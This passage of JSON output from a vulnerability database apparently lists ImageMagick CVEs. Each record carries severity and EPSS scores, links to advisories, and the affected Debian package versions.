"VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-13310" ], "risk_score": 2.4, "exploitability": "0.5", "weighted_severity": "4.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-152y-9pjj-p7b7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49493?format=api", "vulnerability_id": "VCID-18rv-b2mg-jbex", "summary": "Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20224.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20224.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20224", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09616", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09681", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09732", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09636", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09707", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09756", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09769", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09736", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09719", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09606", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09578", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09725", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09767", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20224" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20224", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20224" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124173", "reference_id": "2124173", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124173" }, { "reference_url": "https://security.gentoo.org/glsa/202405-02", "reference_id": "GLSA-202405-02", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202405-02" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2021-20224" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-18rv-b2mg-jbex" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82461?format=api", "vulnerability_id": "VCID-2dgn-j4dn-9fcd", "summary": "imagemagick: use of uninitialized value in functionSyncImageSettings in MagickCore/image.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12979.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12979.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.42785", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.42927", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.42892", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.42875", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.42936", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.42924", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00206", "scoring_system": "epss", "scoring_elements": "0.42862", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43453", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43455", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43425", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43365", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.4339", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0021", "scoring_system": "epss", "scoring_elements": "0.43441", "published_at": "2026-04-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1732294", "reference_id": "1732294", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1732294" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931189", "reference_id": "931189", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931189" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/6985-1/", "reference_id": "USN-6985-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6985-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": 